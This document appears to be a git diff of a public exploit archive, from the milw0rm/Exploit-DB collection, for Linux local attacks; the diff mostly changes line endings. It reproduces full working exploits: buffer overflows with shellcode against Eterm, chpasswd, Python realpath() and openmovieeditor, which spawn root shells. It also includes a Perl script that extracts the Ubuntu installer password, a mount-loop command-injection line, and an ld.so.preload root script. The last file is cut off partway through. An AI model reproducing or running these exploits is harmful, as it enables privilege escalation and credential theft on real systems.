b[2] = (shell >> 8) & 0xff; - b[3] = (shell) & 0xff; - - sprintf(ptr, "%s%c%c%c%c%s%c%c%c%c", first,a[0],a[1], a[2], a[3], last, - b[3],b[2],b[1],b[0]); - - - - execl("/usr/bin/Eterm", "eterm", "-X", ptr, NULL); - return 0; -} - -// milw0rm.com [2006-01-24] +// eterm by default isn't setuid but there is a lot of instances where +// it needs setuid root/utmp to run different options. /str0ke + +/*************************************************************************** + * Copyright ©Rosiello Security 2006 * + * * + * URL: http://www.rosiello.org * + * Author: Johnny Mast * + * e-mail: rave@rosiello.org * + * * + * This program is free software; you can redistribute it and/or modify * + * it under the terms of the GNU General Public License as published by * + * the Free Software Foundation; either version 2 of the License, or * + * (at your option) any later version. * + * * + * This program is distributed in the hope that it will be useful, * + * but WITHOUT ANY WARRANTY; without even the implied warranty of * + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * + * GNU General Public License for more details. * + * * + * You should have received a copy of the GNU General Public License * + * along with this program; if not, write to the * + * Free Software Foundation, Inc., * + * 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * + ***************************************************************************/ + + //Exploit for Ubuntu with no randomized stack + +#include +#include +#include +#include + +char shellcode[] = +/* Set gid */ + "\x90\x90\x90\x90\x90\x90\x90" +"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x2b\x31\xc0\xb0\x47\xcd\x80" +"\x31\xdb\x31\xc9\xb3\x2b\xb1\x2b\x31\xc0\xb0\x47\xcd\x80" + +/* execve() */ +"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" +"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" +"\x80\xe8\xdc\xff\xff\xff/bin/sh"; + + +unsigned long ret = 0xd096edb7; +unsigned long shell = 0xbfffebfd; + + + +int main(void) +{ + char *first, *last, *ptr; + char a[4], b[4]; + int slen = strlen(shellcode); + + if (!(first = (char *)malloc(4165))) + { + printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); + exit(-1); + } + + + if (!(last = (char *)malloc(16))) + { + printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); + exit(-1); + } + + if (!(ptr = (char *)malloc(4183))) + { + printf("%s:%d Could not allocate required memory\n", __FILE__, __LINE__); + exit(-1); + } + + strcpy(first, shellcode); + memset(first+slen, 'A', 4162-slen); + memset(last, 'A', 12); + first[4162] = '\0'; + last[12] = '\0'; + + a[0] = (ret >> 24) & 0xff; + a[1] = (ret >> 16) & 0xff; + a[2] = (ret >> 8) & 0xff; + a[3] = (ret) & 0xff; + + + b[0] = (shell >> 24) & 0xff; + b[1] = (shell >> 16) & 0xff; + b[2] = (shell >> 8) & 0xff; + b[3] = (shell) & 0xff; + + sprintf(ptr, "%s%c%c%c%c%s%c%c%c%c", first,a[0],a[1], a[2], a[3], last, + b[3],b[2],b[1],b[0]); + + + + execl("/usr/bin/Eterm", "eterm", "-X", ptr, NULL); + return 0; +} + +// milw0rm.com [2006-01-24] diff --git a/platforms/linux/local/1449.c b/platforms/linux/local/1449.c index 4ad47e7da..f30c5f1ef 100755 --- a/platforms/linux/local/1449.c +++ b/platforms/linux/local/1449.c @@ -1,53 +1,53 @@ -/* -Change passwd 3.1 (SquirrelMail plugin ) - -Coded by rod hedor - -web-- http://lezr.com - -[local exploit] - - * Multiple buffer overflows are present in the handling of command line arguements in chpasswd. - The bug allows a hacker to exploit the process to run arbitrary code. -*/ - -#include -#include - -const char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90" - "\x31\xc0\xb0\x17\x31\xdb\xcd\x80" - "\x89\xe5\x31\xc0\x50\x55\x89\xe5" - "\x50\x68\x6e\x2f\x73\x68\x68\x2f" - "\x2f\x62\x69\x89\xe3\x89\xe9\x89" - "\xea\xb0\x0b\xcd\x80"; - -long get_sp(){ - __asm__("movl %esp,%eax;"); -}; - -int main(){ - char buffer[1024]; - long stack = get_sp(); - int result = 1; - long offset = 0; - printf ("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n"); - printf ("[+] Current stack [0x%x]\n",stack); - while(offset <= 268435456){ - offset = offset + 1; - stack = get_sp() + offset; - memcpy(&buffer,"EGG=",4); - int a = 4; - while(a <= 108){ - memcpy(&buffer[a],"x",1); - a = a + 1;} - memcpy(&buffer[108],&stack,4); - memcpy(&buffer[112],&shellcode,sizeof(shellcode)); - putenv(buffer); - result = system("./chpasswd $EGG"); - if(result == 0){exit(0);}; - }; -}; - -// milw0rm.com [2006-01-25] +/* +Change passwd 3.1 (SquirrelMail plugin ) + +Coded by rod hedor + +web-- http://lezr.com + +[local exploit] + + * Multiple buffer overflows are present in the handling of command line arguements in chpasswd. + The bug allows a hacker to exploit the process to run arbitrary code. +*/ + +#include +#include + +const char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90" + "\x31\xc0\xb0\x17\x31\xdb\xcd\x80" + "\x89\xe5\x31\xc0\x50\x55\x89\xe5" + "\x50\x68\x6e\x2f\x73\x68\x68\x2f" + "\x2f\x62\x69\x89\xe3\x89\xe9\x89" + "\xea\xb0\x0b\xcd\x80"; + +long get_sp(){ + __asm__("movl %esp,%eax;"); +}; + +int main(){ + char buffer[1024]; + long stack = get_sp(); + int result = 1; + long offset = 0; + printf ("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n"); + printf ("[+] Current stack [0x%x]\n",stack); + while(offset <= 268435456){ + offset = offset + 1; + stack = get_sp() + offset; + memcpy(&buffer,"EGG=",4); + int a = 4; + while(a <= 108){ + memcpy(&buffer[a],"x",1); + a = a + 1;} + memcpy(&buffer[108],&stack,4); + memcpy(&buffer[112],&shellcode,sizeof(shellcode)); + putenv(buffer); + result = system("./chpasswd $EGG"); + if(result == 0){exit(0);}; + }; +}; + +// milw0rm.com [2006-01-25] diff --git a/platforms/linux/local/1579.pl b/platforms/linux/local/1579.pl index 74c66e675..4622944e3 100755 --- a/platforms/linux/local/1579.pl +++ b/platforms/linux/local/1579.pl @@ -1,62 +1,62 @@ -#!/usr/bin/perl -w - -use warnings; -use strict; - -############################################################################## -# Author: Kristian Hermansen -# Date: 3/12/2006 -# Overview: Ubuntu Breezy stores the installation password in plain text -# Link: https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606 -############################################################################## - -print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; -print "Kristian Hermansen's 'Eazy Breezy' Password Recovery Tool\n"; -print "99% effective, thank your local admin ;-)\n"; -print "FOR EDUCATIONAL PURPOSES ONLY!!!\n"; -print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; - -# the two vulnerable files -my $file1 = "/var/log/installer/cdebconf/questions.dat"; -my $file2 = "/var/log/debian-installer/cdebconf/questions.dat"; - -print "Checking if an exploitable file exists..."; -if ( (-e $file1) || (-e $file2) ) -{ - print "Yes\nNow checking if readable..."; - if ( -r $file1 ) - { - getinfo($file1); - } - else - { - if ( -r $file2 ) { - getinfo($file2); - } - else { - print "No\nAdmin may have changed the permissions on the files :-(\nExiting...\n"; - exit(-2); - } - } -} -else -{ - print "No\nFile may have been deleted by the administrator :-(\nExiting...\n"; - exit(-1); -} - -sub getinfo { - my $fn = shift; - print "Yes\nHere come the details...\n\n"; - my $realname = `grep -A 1 "Template: passwd/user-fullname" $fn | grep "Value: " | sed 's/Value: //'`; - my $user = `grep -A 1 "Template: passwd/username" $fn | grep "Value: " | sed 's/Value: //'`; - my $pass = `grep -A 1 "Template: passwd/user-password-again" $fn | grep "Value: " | sed 's/Value: //'`; - chomp($realname); - chomp($user); - chomp($pass); - print "Real Name: $realname\n"; - print "Username: $user\n"; - print "Password: $pass\n"; -} - -# milw0rm.com [2006-03-12] +#!/usr/bin/perl -w + +use warnings; +use strict; + +############################################################################## +# Author: Kristian Hermansen +# Date: 3/12/2006 +# Overview: Ubuntu Breezy stores the installation password in plain text +# Link: https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606 +############################################################################## + +print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; +print "Kristian Hermansen's 'Eazy Breezy' Password Recovery Tool\n"; +print "99% effective, thank your local admin ;-)\n"; +print "FOR EDUCATIONAL PURPOSES ONLY!!!\n"; +print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; + +# the two vulnerable files +my $file1 = "/var/log/installer/cdebconf/questions.dat"; +my $file2 = "/var/log/debian-installer/cdebconf/questions.dat"; + +print "Checking if an exploitable file exists..."; +if ( (-e $file1) || (-e $file2) ) +{ + print "Yes\nNow checking if readable..."; + if ( -r $file1 ) + { + getinfo($file1); + } + else + { + if ( -r $file2 ) { + getinfo($file2); + } + else { + print "No\nAdmin may have changed the permissions on the files :-(\nExiting...\n"; + exit(-2); + } + } +} +else +{ + print "No\nFile may have been deleted by the administrator :-(\nExiting...\n"; + exit(-1); +} + +sub getinfo { + my $fn = shift; + print "Yes\nHere come the details...\n\n"; + my $realname = `grep -A 1 "Template: passwd/user-fullname" $fn | grep "Value: " | sed 's/Value: //'`; + my $user = `grep -A 1 "Template: passwd/username" $fn | grep "Value: " | sed 's/Value: //'`; + my $pass = `grep -A 1 "Template: passwd/user-password-again" $fn | grep "Value: " | sed 's/Value: //'`; + chomp($realname); + chomp($user); + chomp($pass); + print "Real Name: $realname\n"; + print "Username: $user\n"; + print "Password: $pass\n"; +} + +# milw0rm.com [2006-03-12] diff --git a/platforms/linux/local/1591.py b/platforms/linux/local/1591.py index 9a38a5eee..a58d58d31 100755 --- a/platforms/linux/local/1591.py +++ b/platforms/linux/local/1591.py @@ -1,47 +1,47 @@ -#!/usr/bin/python - -# gexp-python.py -# -# Python <= 2.4.2 realpath() Local Stack Overflow -# ----------------------------------------------- -# Against VA Space Randomization. -# -# Copyright (c) 2006 Gotfault Security -# -# Bug found and developed by: dx/vaxen (Gotfault Security), -# posidron (Tripbit Research Group). -# Enviroment: -# -# Kernel Version : 2.6.12.5-vs2.0 -# GCC Version : 4.0.3 -# Libc Version : 2.3.5 -# -# Special greets goes to : posidron from tripbit.net -# RFDSLabs, barros, izik, -# Gotfault Security Community. -# -# Original Reference: -# http://gotfault.net/research/exploit/gexp-python.py - -import os - -# JMP *%ESP @ linux-gate.so.1 -jmp = "\x5f\xe7\xff\xff" - -shell = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e" -shell += "\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3" -shell += "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" -shell += "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" - -os.chdir("/tmp") -base = os.getcwd() -dir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell) -os.makedirs(dir) -os.chdir(dir) - -os.system('> vuln.py; python vuln.py') -os.remove("vuln.py") -os.chdir(base) -os.removedirs(dir) - -# milw0rm.com [2006-03-18] +#!/usr/bin/python + +# gexp-python.py +# +# Python <= 2.4.2 realpath() Local Stack Overflow +# ----------------------------------------------- +# Against VA Space Randomization. +# +# Copyright (c) 2006 Gotfault Security +# +# Bug found and developed by: dx/vaxen (Gotfault Security), +# posidron (Tripbit Research Group). +# Enviroment: +# +# Kernel Version : 2.6.12.5-vs2.0 +# GCC Version : 4.0.3 +# Libc Version : 2.3.5 +# +# Special greets goes to : posidron from tripbit.net +# RFDSLabs, barros, izik, +# Gotfault Security Community. +# +# Original Reference: +# http://gotfault.net/research/exploit/gexp-python.py + +import os + +# JMP *%ESP @ linux-gate.so.1 +jmp = "\x5f\xe7\xff\xff" + +shell = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e" +shell += "\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3" +shell += "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" +shell += "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + +os.chdir("/tmp") +base = os.getcwd() +dir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell) +os.makedirs(dir) +os.chdir(dir) + +os.system('> vuln.py; python vuln.py') +os.remove("vuln.py") +os.chdir(base) +os.removedirs(dir) + +# milw0rm.com [2006-03-18] diff --git a/platforms/linux/local/178.c b/platforms/linux/local/178.c index c1da6059a..024b1ef1f 100755 --- a/platforms/linux/local/178.c +++ b/platforms/linux/local/178.c @@ -132,6 +132,6 @@ int main() return( -1 ); } - - -// milw0rm.com [2000-11-15] + + +// milw0rm.com [2000-11-15] diff --git a/platforms/linux/local/180.c b/platforms/linux/local/180.c index 203aa68f3..3dcd7a2fd 100755 --- a/platforms/linux/local/180.c +++ b/platforms/linux/local/180.c @@ -50,6 +50,6 @@ int main(int argc,char **argv){ printf("*** execution of %s failed. (check the path)\n",PATH); exit(-1); } -} - -// milw0rm.com [2000-11-15] +} + +// milw0rm.com [2000-11-15] diff --git a/platforms/linux/local/182.sh b/platforms/linux/local/182.sh index 12011863c..ce99a13af 100755 --- a/platforms/linux/local/182.sh +++ b/platforms/linux/local/182.sh @@ -16,7 +16,7 @@ # # Please do NOT remove this header from the file. # - + echo "###########################################" echo "# /sbin/restore exploit for rh6.2 #" echo "# this file by nawok '00 #" @@ -36,6 +36,6 @@ echo "==> DONE! If everything went OK we will now enter rootshell..." echo "==> To check if its rooted, type 'whoami', or 'id'" echo "==> B-Bye, you are on your own now." /home/$USER/sh - - -# milw0rm.com [2000-11-16] + + +# milw0rm.com [2000-11-16] diff --git a/platforms/linux/local/183.c b/platforms/linux/local/183.c index 2e28b8980..ea9582077 100755 --- a/platforms/linux/local/183.c +++ b/platforms/linux/local/183.c @@ -57,6 +57,6 @@ void main(int argc, char *argv[]) { sprintf(binary,"%s/bin/oidldapd connect=$EGG",ORACLE_HOME); system(binary); } - - -// milw0rm.com [2000-11-16] + + +// milw0rm.com [2000-11-16] diff --git a/platforms/linux/local/184.pl b/platforms/linux/local/184.pl index 28b99a10c..7b13f7d55 100755 --- a/platforms/linux/local/184.pl +++ b/platforms/linux/local/184.pl @@ -139,6 +139,6 @@ else { USAGE ; } - - -# milw0rm.com [2000-11-16] + + +# milw0rm.com [2000-11-16] diff --git a/platforms/linux/local/186.pl b/platforms/linux/local/186.pl index 259addb14..e252eee46 100755 --- a/platforms/linux/local/186.pl +++ b/platforms/linux/local/186.pl @@ -47,6 +47,6 @@ int main(int argc,char **argv){ exit(0); } } - - -# milw0rm.com [2000-11-17] + + +# milw0rm.com [2000-11-17] diff --git a/platforms/linux/local/193.sh b/platforms/linux/local/193.sh index 116dacae8..35ceab4c2 100755 --- a/platforms/linux/local/193.sh +++ b/platforms/linux/local/193.sh @@ -31,6 +31,6 @@ echo "Waiting for rootshell .... 5 seconds...." sleep 5 /tmp/sush id - - -# milw0rm.com [2000-11-19] + + +# milw0rm.com [2000-11-19] diff --git a/platforms/linux/local/2016.sh b/platforms/linux/local/2016.sh index b1cbd761a..01076106b 100755 --- a/platforms/linux/local/2016.sh +++ b/platforms/linux/local/2016.sh @@ -1,12 +1,12 @@ -#!/bin/sh -############################################################################## -## rocksmountdirty.sh: Rocks release <=4.1 local root exploit -## make sure 'mount-loop' is in your path for this to work. -## -## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] -############################################################################## -echo "Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]" -echo "getting root.. goodluck" -mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'" - -# milw0rm.com [2006-07-15] +#!/bin/sh +############################################################################## +## rocksmountdirty.sh: Rocks release <=4.1 local root exploit +## make sure 'mount-loop' is in your path for this to work. +## +## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] +############################################################################## +echo "Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]" +echo "getting root.. goodluck" +mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'" + +# milw0rm.com [2006-07-15] diff --git a/platforms/linux/local/203.sh b/platforms/linux/local/203.sh index 16b55bb68..07afcc6a7 100755 --- a/platforms/linux/local/203.sh +++ b/platforms/linux/local/203.sh @@ -201,6 +201,6 @@ while :; do echo exit 1 done - - -# milw0rm.com [2000-11-21] + + +# milw0rm.com [2000-11-21] diff --git a/platforms/linux/local/206.c b/platforms/linux/local/206.c index 3fbedae69..c5d7089c8 100755 --- a/platforms/linux/local/206.c +++ b/platforms/linux/local/206.c @@ -117,6 +117,6 @@ int main(int argc, char *argv[], char *envp[]) exit(0); } - - -// milw0rm.com [2000-11-29] + + +// milw0rm.com [2000-11-29] diff --git a/platforms/linux/local/209.c b/platforms/linux/local/209.c index 27be32d50..f0b82c661 100755 --- a/platforms/linux/local/209.c +++ b/platforms/linux/local/209.c @@ -603,6 +603,6 @@ dentry->d_name); printf("failed to find a valid language\naborting\n"); exit(0); } - - -// milw0rm.com [2000-11-30] + + +// milw0rm.com [2000-11-30] diff --git a/platforms/linux/local/2144.sh b/platforms/linux/local/2144.sh index a2153fed9..2e7e42c22 100755 --- a/platforms/linux/local/2144.sh +++ b/platforms/linux/local/2144.sh @@ -1,26 +1,26 @@ -#!/bin/sh -echo -echo "mtink libXm local root exploit" -echo "* karol@wiesek.pl *" -echo -umask 000 -export DEBUG_FILE="/etc/ld.so.preload" -cat > /tmp/lib.c << _EOF -#include -void _init(void) -{ - if (getuid()!=0 && geteuid()==0) - { - setuid(0); - unlink("/etc/ld.so.preload"); - execl("/bin/bash", "bash", 0); - } -} -_EOF -/usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c -/usr/bin/ld -shared -o /tmp/lib.so /tmp/lib.o -/usr/bin/mtink -echo "/tmp/lib.so" > /etc/ld.so.preload -/bin/ping - -# milw0rm.com [2006-08-08] +#!/bin/sh +echo +echo "mtink libXm local root exploit" +echo "* karol@wiesek.pl *" +echo +umask 000 +export DEBUG_FILE="/etc/ld.so.preload" +cat > /tmp/lib.c << _EOF +#include +void _init(void) +{ + if (getuid()!=0 && geteuid()==0) + { + setuid(0); + unlink("/etc/ld.so.preload"); + execl("/bin/bash", "bash", 0); + } +} +_EOF +/usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c +/usr/bin/ld -shared -o /tmp/lib.so /tmp/lib.o +/usr/bin/mtink +echo "/tmp/lib.so" > /etc/ld.so.preload +/bin/ping + +# milw0rm.com [2006-08-08] diff --git a/platforms/linux/local/215.c b/platforms/linux/local/215.c index 961adfc1e..a4bcbb767 100755 --- a/platforms/linux/local/215.c +++ b/platforms/linux/local/215.c @@ -164,6 +164,6 @@ int main(int argc, char** argv) { execle(xpath, "mount", numbuf, 0, envbuf); } - - -// milw0rm.com [2000-12-02] + + +// milw0rm.com [2000-12-02] diff --git a/platforms/linux/local/217.c b/platforms/linux/local/217.c index bb7b89b56..d535960f6 100755 --- a/platforms/linux/local/217.c +++ b/platforms/linux/local/217.c @@ -93,6 +93,6 @@ main() printf("* my work here is done.\n\n"); printf("now pray for some kinda of crash.\n\n\t--zen\n"); } - - -// milw0rm.com [2000-12-04] + + +// milw0rm.com [2000-12-04] diff --git a/platforms/linux/local/218.c b/platforms/linux/local/218.c index 98486a7dc..28e93b2a0 100755 --- a/platforms/linux/local/218.c +++ b/platforms/linux/local/218.c @@ -102,6 +102,6 @@ int main(int argc, char *argv[]) { setenv("HOME", buf, 1); system(EXPECT); } - - -// milw0rm.com [2000-12-04] + + +// milw0rm.com [2000-12-04] diff --git a/platforms/linux/local/219.c b/platforms/linux/local/219.c index b1d992903..73598323d 100755 --- a/platforms/linux/local/219.c +++ b/platforms/linux/local/219.c @@ -100,6 +100,6 @@ main(int argc, char **argv){ fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address, offset, allign); execlp("/usr/lib/games/gnomehack/gnomehack", "gnomehack", 0); //Mod path if needed. } - - -// milw0rm.com [2000-12-04] + + +// milw0rm.com [2000-12-04] diff --git a/platforms/linux/local/2193.php b/platforms/linux/local/2193.php index b645aa604..ad91bbd38 100755 --- a/platforms/linux/local/2193.php +++ b/platforms/linux/local/2193.php @@ -1,137 +1,137 @@ - - -# milw0rm.com [2006-08-16] + + +# milw0rm.com [2006-08-16] diff --git a/platforms/linux/local/221.c b/platforms/linux/local/221.c index 31b85cede..ea535cd03 100755 --- a/platforms/linux/local/221.c +++ b/platforms/linux/local/221.c @@ -85,6 +85,6 @@ main(int argc, char **argv){ fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address,offset,allign); execlp("/opt/kde/bin/kwintv", "kwintv", 0);//Change path if needed. :D } - - -// milw0rm.com [2000-12-06] + + +// milw0rm.com [2000-12-06] diff --git a/platforms/linux/local/222.c b/platforms/linux/local/222.c index f26f4ac68..cba6a251c 100755 --- a/platforms/linux/local/222.c +++ b/platforms/linux/local/222.c @@ -44,6 +44,6 @@ main(int argc, char **argv){ fprintf(stderr,"Return address %#x, offset: %d.\n",address,offset); execlp("/opt/gnome/bin/gnome_segv","gnome_segv",0); } - - -// milw0rm.com [2000-12-06] + + +// milw0rm.com [2000-12-06] diff --git a/platforms/linux/local/229.c b/platforms/linux/local/229.c index 094d81b6b..740ebad55 100755 --- a/platforms/linux/local/229.c +++ b/platforms/linux/local/229.c @@ -43,6 +43,6 @@ main (int argc, char *argv[]) fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE); execl ("./xsoldier", "xsoldier", "-display", buffer, 0); } - - -// milw0rm.com [2000-12-15] + + +// milw0rm.com [2000-12-15] diff --git a/platforms/linux/local/231.sh b/platforms/linux/local/231.sh index 311fcc8d1..2c0ddaaec 100755 --- a/platforms/linux/local/231.sh +++ b/platforms/linux/local/231.sh @@ -43,6 +43,6 @@ chmod 777 $PICO_FILE echo "Get the message from "$PICO_FILE echo "^C to break tailer" tail -f $PICO_FILE - - -# milw0rm.com [2000-12-15] + + +# milw0rm.com [2000-12-15] diff --git a/platforms/linux/local/2338.c b/platforms/linux/local/2338.c index 129041ce0..14fca3e52 100755 --- a/platforms/linux/local/2338.c +++ b/platforms/linux/local/2338.c @@ -1,125 +1,125 @@ -/* - * openmovieeditor buffer overflow exploit - * by qnix < qnix[at]bsdmail[dot]org - * - * Dont forget to change the return address (RETADDR) - * - * - * -------------------------- - * devil: ~ \> envt/envt -s 2 - * Shellcode: linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes - * [+] Setting memory for the shellcode. - * [+] Copying shellcode to memory. - * [+] Putting shellcode in the environment. - * [+] Going into the environment (ENVT) and exiting .... - * Done 37 bytes loaded to (ENVT) - * devil: ~ \> envt/envt - * SHELLCODE FOUND IN 0xbffffbf5 - * devil: ~ \> ./ome_buf - * - * ***************************************** - * openmovieeditor buffer overflow exploit - * by qnix < qnix[at]bsdmail[dot]org - * Dont forget to change the return address - * ***************************************** - * - * Usage : ./ome_buf - * devil: ~ \> ./ome_buf Video\ Projects/exploit.vproj /usr/local/bin/openmovieeditor - * - * [+] Video Projects/exploit.vproj Created|Opened - * [~] Desired Return Addr : 0xbffffbf5 - * [~] Offset from ESP : 0x0 - * [+] Executing openmovieeditor - * - * sh-3.1# whoami;id - * root - * uid=0(root) gid=0(root) groups=0(root) - * sh-3.1# exit - * exit - * - * -------------------------- - * - * */ - -#include -#include - -#define RETADDR '\xbf\xff\xfb\xf5' -#define SLEEP sleep(1); - -int main(int argc,char *argv[]) { - FILE *output; - - int i, offset; - long ret, *addr_ptr; - char *buffer, *ptr; - - offset = 0; - ret = RETADDR - offset; - - if(argc != 3) { - fprintf(stderr,"\n*****************************************\n"); - fprintf(stderr,"openmovieeditor buffer overflow exploit\n"); - fprintf(stderr,"by qnix < qnix[at]bsdmail[dot]org\n"); - fprintf(stderr,"Dont forget to change the return address\n"); - fprintf(stderr,"*****************************************\n\n"); - - fprintf(stderr,"Usage : %s \n",argv[0]); - return 0; - } - - output = fopen(argv[1],"w+"); - - if(output == 0) { - fprintf(stderr,"\n[-] Cannot create %s\n",argv[1]); - SLEEP - return 0; - } else { - fprintf(stdout,"\n[+] %s Created|Opened\n",argv[1]); - SLEEP - } - - fprintf(output,"\n"); - fprintf(output,"\n"); - fprintf(output," 0.0.20060901\n"); - - /* evil code ^_^ */ - buffer = malloc(2300); - ptr = buffer; - addr_ptr = (long *) ptr; - for(i=0; i < 2300; i+=4) - { *(addr_ptr++) = ret; } - for(i=0; i < 1040; i++) - { buffer[i] = '\x90'; } - ptr = buffer + 1044; - buffer[2300-1] = 0; - - fprintf(output," %s\n",buffer); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output," \n"); - fprintf(output,"\n"); - - fprintf(stdout,"[~] Desired Return Addr : 0x%x\n", ret); - SLEEP - fprintf(stdout,"[~] Offset from ESP : 0x%x\n", offset); - SLEEP - - fprintf(stdout,"[+] Executing openmovieeditor\n\n"); - fclose(output); - SLEEP - - execl(argv[2],"openmovieeditor",0); - - return 0; -} - -// milw0rm.com [2006-09-09] +/* + * openmovieeditor buffer overflow exploit + * by qnix < qnix[at]bsdmail[dot]org + * + * Dont forget to change the return address (RETADDR) + * + * + * -------------------------- + * devil: ~ \> envt/envt -s 2 + * Shellcode: linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes + * [+] Setting memory for the shellcode. + * [+] Copying shellcode to memory. + * [+] Putting shellcode in the environment. + * [+] Going into the environment (ENVT) and exiting .... + * Done 37 bytes loaded to (ENVT) + * devil: ~ \> envt/envt + * SHELLCODE FOUND IN 0xbffffbf5 + * devil: ~ \> ./ome_buf + * + * ***************************************** + * openmovieeditor buffer overflow exploit + * by qnix < qnix[at]bsdmail[dot]org + * Dont forget to change the return address + * ***************************************** + * + * Usage : ./ome_buf + * devil: ~ \> ./ome_buf Video\ Projects/exploit.vproj /usr/local/bin/openmovieeditor + * + * [+] Video Projects/exploit.vproj Created|Opened + * [~] Desired Return Addr : 0xbffffbf5 + * [~] Offset from ESP : 0x0 + * [+] Executing openmovieeditor + * + * sh-3.1# whoami;id + * root + * uid=0(root) gid=0(root) groups=0(root) + * sh-3.1# exit + * exit + * + * -------------------------- + * + * */ + +#include +#include + +#define RETADDR '\xbf\xff\xfb\xf5' +#define SLEEP sleep(1); + +int main(int argc,char *argv[]) { + FILE *output; + + int i, offset; + long ret, *addr_ptr; + char *buffer, *ptr; + + offset = 0; + ret = RETADDR - offset; + + if(argc != 3) { + fprintf(stderr,"\n*****************************************\n"); + fprintf(stderr,"openmovieeditor buffer overflow exploit\n"); + fprintf(stderr,"by qnix < qnix[at]bsdmail[dot]org\n"); + fprintf(stderr,"Dont forget to change the return address\n"); + fprintf(stderr,"*****************************************\n\n"); + + fprintf(stderr,"Usage : %s \n",argv[0]); + return 0; + } + + output = fopen(argv[1],"w+"); + + if(output == 0) { + fprintf(stderr,"\n[-] Cannot create %s\n",argv[1]); + SLEEP + return 0; + } else { + fprintf(stdout,"\n[+] %s Created|Opened\n",argv[1]); + SLEEP + } + + fprintf(output,"\n"); + fprintf(output,"\n"); + fprintf(output," 0.0.20060901\n"); + + /* evil code ^_^ */ + buffer = malloc(2300); + ptr = buffer; + addr_ptr = (long *) ptr; + for(i=0; i < 2300; i+=4) + { *(addr_ptr++) = ret; } + for(i=0; i < 1040; i++) + { buffer[i] = '\x90'; } + ptr = buffer + 1044; + buffer[2300-1] = 0; + + fprintf(output," %s\n",buffer); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output," \n"); + fprintf(output,"\n"); + + fprintf(stdout,"[~] Desired Return Addr : 0x%x\n", ret); + SLEEP + fprintf(stdout,"[~] Offset from ESP : 0x%x\n", offset); + SLEEP + + fprintf(stdout,"[+] Executing openmovieeditor\n\n"); + fclose(output); + SLEEP + + execl(argv[2],"openmovieeditor",0); + + return 0; +} + +// milw0rm.com [2006-09-09] diff --git a/platforms/linux/local/2404.c b/platforms/linux/local/2404.c index 449449145..d3aba08ae 100755 --- a/platforms/linux/local/2404.c +++ b/platforms/linux/local/2404.c @@ -1,208 +1,208 @@ -/******************************************************************** - -stetoscope.c: -Dr.Web 4.33 antivirus LHA directory name heap overflow for linux - - -- Howto: - - Find a valid GOT entry to hijack with objdump -R /opt/drweb/drweb . - I guess that you can use the address of free(), but my exploit - uses the address of realpath(). There was a NULL byte in the GOT - entry of free() so I had to find something else ;-) - - Calling the exploit will produce a file. Scan this file with a - vulnerable version of drweb and you will, hopefully, get a shell :-) - - Good luck! - - -- Exploit particularities: - - - There is a NOP sled using \xeb\x0a . Increases exploit - reliability - - 0xff and 0x00 are filtered caracters - - Bypass some malloc security checks added in malloc.c: - - Little security check which won't hurt performance: 